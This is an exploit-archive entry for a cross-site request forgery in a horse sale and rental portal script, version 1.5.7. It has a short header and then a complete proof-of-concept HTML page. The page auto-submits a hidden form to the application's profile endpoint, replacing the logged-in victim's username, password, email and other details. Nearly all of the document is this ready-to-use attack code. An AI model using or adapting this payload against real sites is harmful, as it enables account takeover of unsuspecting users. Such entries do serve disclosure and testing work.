32 lines
No EOL
1.2 KiB
Text
32 lines
No EOL
1.2 KiB
Text
# Exploit Title: Horse Market Sell & Rent Portal Script 1.5.7 - Cross-Site Request Forgery
|
|
# Date: 2018-05-15
|
|
# Exploit Author: L0RD
|
|
# Vendor Homepage: https://codecanyon.net/item/horse-market-sell-rent-portal/14174352?s_rank=1725
|
|
# CVE: N/A
|
|
# Version: 1.5.7
|
|
# Tested on: Kali linux
|
|
|
|
# Details:
|
|
# Horse Market Sell & Rent Portal Script has CSRF vulnerability which attacker can change user information.
|
|
|
|
# Exploit :
|
|
<html>
|
|
<head>
|
|
<title>CSRF POC</title>
|
|
</head>
|
|
<body>
|
|
<form action="http://geniuscript.com/horse-script/index.php/frontend/myprofile/en" method="POST">
|
|
<input type="hidden" name="name_surname" value="D3C0DE" />
|
|
<input type="hidden" name="username" value="L0RD" />
|
|
<input type="hidden" name="password" value="anything" />
|
|
<input type="hidden" name="password_confirm" value="anything" />
|
|
<input type="hidden" name="address" value="Cyro trento 23" />
|
|
<input type="hidden" name="description" value="My description 2" />
|
|
<input type="hidden" name="phone" value="+10101010" />
|
|
<input type="hidden" name="mail" value="lord@gmail.com" />
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html> |